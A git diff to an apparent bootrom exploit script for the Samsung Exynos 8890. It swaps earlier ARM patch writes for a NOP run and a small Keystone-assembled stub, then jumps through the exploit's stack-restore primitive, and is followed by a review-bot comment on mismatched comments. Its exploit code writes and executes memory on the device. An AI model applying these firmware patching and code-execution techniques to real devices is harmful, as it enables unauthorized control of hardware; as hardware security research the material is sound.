diff --git a/source/exploit/exploit.py b/source/exploit/exploit.py
index c10a02f..cd0f749 100644
--- a/source/exploit/exploit.py
+++ b/source/exploit/exploit.py
@@ -806,61 +806,21 @@ class ExynosDevice():
 print(self.cd.memdump_region(0x8f063710, 0x8)) # Modify USB Recovyer mode string to: NFI Patched BL33
- self.cd.memwrite_region(0x8f06ab10, b'\x4e\x46\x49\x20\x50\x61\x74\x63\x68\x69\x6e\x67\x20\x42\x4c\x33\x33')
+ patch_string = b'\x4e\x46\x49\x20\x50\x61\x74\x63\x68\x69\x6e\x67\x20\x42\x4c\x33\x33'
+ # self.cd.memwrite_region(0x8f06ab10, b'\x4e\x46\x49\x20\x50\x61\x74\x63\x68\x69\x6e\x67\x20\x42\x4c\x33\x33')
 # Print state of x30/LR on screen # self.cd.memwrite_region(0x8f01dc08, struct.pack('>I', 0xa40000f9))
- # # Nop-able, but executed space
- self.cd.memwrite_region(0x8f01dca8, struct.pack('>I', 0x804682d2))
- # self.cd.memwrite_region(0x8f01dca8, struct.pack('>I', 0x1f2003d5))
+ # Write NOP from 0x8f008cb8 to 0x8f008d14
+ self.cd.memwrite_region(0x8f008cb8, b'\x1f\x20\x03\xd5' * 10)
- self.cd.memwrite_region(0x8f01dcb0, struct.pack('>I', 0xe4ff9fd2))
- # self.cd.memwrite_region(0x8f01dcb0, struct.pack('>I', 0x1f2003d5))
-
- self.cd.memwrite_region(0x8f01dcb4, struct.pack('>I', 0xe5030091))
- # self.cd.memwrite_region(0x8f01dcb4, struct.pack('>I', 0x1f2003d5))
-
- self.cd.memwrite_region(0x8f008cb8, struct.pack('>I', 0xaaaaaaaa)) #0x24660094
- # self.cd.memwrite_region(0x8f008cb8, struct.pack('>I', 0x1f2003d5))
-
- # self.cd.memwrite_region(0x8f008cb8, struct.pack('>I', 0x03028052)) # Set W3
- self.cd.memwrite_region(0x8f008cb8, struct.pack('>I', 0x1f2003d5))
-
- # self.cd.memwrite_region(0x8f008ccc, struct.pack('>I', 0xe3ff9fd2)) # Set x3
- self.cd.memwrite_region(0x8f008ccc, struct.pack('>I', 0x1f2003d5)) # Set x3
-
- # self.cd.memwrite_region(0x8f008cc0, struct.pack('>I', 0xe2ff9fd2)) # Set x2
- self.cd.memwrite_region(0x8f008cc0, struct.pack('>I', 0x1f2003d5)) # Set x2
-
- # # self.cd.memwrite_region(0x8f008cc4, struct.pack('>I', 0x804682d2)) # Set x0 to 0x0
- self.cd.memwrite_region(0x8f008cc4, struct.pack('>I', 0x1f2003d5)) # Set x0 to 0x0
-
- # self.cd.memwrite_region(0x8f008cc8, struct.pack('>I', 0x410280d2)) # Set x1
- self.cd.memwrite_region(0x8f008cc8, struct.pack('>I', 0x1f2003d5)) # Set x1
-
- # self.cd.memwrite_region(0x8f008cdc, struct.pack('>I', 0xe4ff9fd2)) # Set x4 to 0xffff
- self.cd.memwrite_region(0x8f008cdc, struct.pack('>I', 0x1f2003d5)) # Set x4 to 0xffff
-
- # self.cd.memwrite_region(0x8f008cd0, struct.pack('>I', 0xe5030091)) # Set x5 to SP
- self.cd.memwrite_region(0x8f008cd0, struct.pack('>I', 0x1f2003d5)) # Set x5 to SP
-
- # self.cd.memwrite_region(0x8f008cd4, struct.pack('>I', 0x00013fd6)) # Jump to screen function
- self.cd.memwrite_region(0x8f008cd4, struct.pack('>I', 0x1f2003d5)) # Jump to screen function
-
- # self.cd.memwrite_region(0x8f008cd8, struct.pack('>I', 0xc00800b0)) # Set x7 to 0x0
- self.cd.memwrite_region(0x8f008cd8, struct.pack('>I', 0x1f2003d5)) # Set x7 to 0x0
-
- ### SCREEN PATCHES
- # Nop initial l_display screen at 0x8f022654
- # self.cd.memwrite_region(0x8f022654, struct.pack('>I', 0x1f2003d5))
- # self.cd.memwrite_region(0x8f022658, struct.pack('>I', 0x1f2003d5))
- # self.cd.memwrite_region(0x8f022658, struct.pack('>I', 0xe40300b9)) #Modify offset at pinter that contains the to-be printed text
- # # Modify jh_format_log to instead jump to l_display_screen
- # self.cd.memwrite_region(0x8f02265c, struct.pack('>I', 0xbbffff97))
-
- # For when it works. Write jump
- # self.cd.memwrite_region(0x8f008cb4, struct.pack('>I', 0x25660094))
+ # Write opcode that writes 'aaaaaaaa' at 0x8f06ab10 +0x8
+ shellcode = f"""
+ mov x21, #0x1
+ """
+ shellcode = ks.asm(shellcode, as_bytes=True)[0]
+ self.cd.memwrite_region(0x8f008cb8, shellcode)
 self.cd.restore_stack_and_jump(0x02024e5c)
diff --git a/source/ghidra-transfer/8890_bootrom_bl31_bl2_7Sep2024.bin.gzf b/source/ghidra-transfer/8890_bootrom_bl31_bl2_7Sep2024.bin.gzf
index 916b745..220da93 100644
Binary files a/source/ghidra-transfer/8890_bootrom_bl31_bl2_7Sep2024.bin.gzf and b/source/ghidra-transfer/8890_bootrom_bl31_bl2_7Sep2024.bin.gzf differ
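Review bot: The two comments added in this hunk do not match the writes under them: `b'\x1f\x20\x03\xd5' * 10` is 40 bytes, so the NOPs cover 0x8f008cb8 through 0x8f008cdf rather than "to 0x8f008d14" (that span would be 92 bytes, 23 instructions), and `# Write opcode that writes 'aaaaaaaa' at 0x8f06ab10 +0x8` sits above an assembly stub that is only `mov x21, #0x1`. Either the comments or the constants should be brought into agreement, e.g. `# Write 10 NOPs (40 bytes) at 0x8f008cb8..0x8f008cdf` and a comment stating what the `mov x21, #0x1` stub is actually testing. `patch_string` is assigned but never read now that the memwrite under it is commented out, and the `f"""..."""` literal has no placeholders, so a plain `"""` string is enough. The second `memwrite_region(0x8f008cb8, shellcode)` lands on the same address as the NOP run just written, which reads as intentional but deserves a one-line comment saying the assembled bytes replace the head of the NOP run. The enclosing method starts before the hunk, so `ks` and `self.cd` are assumed to be set up there.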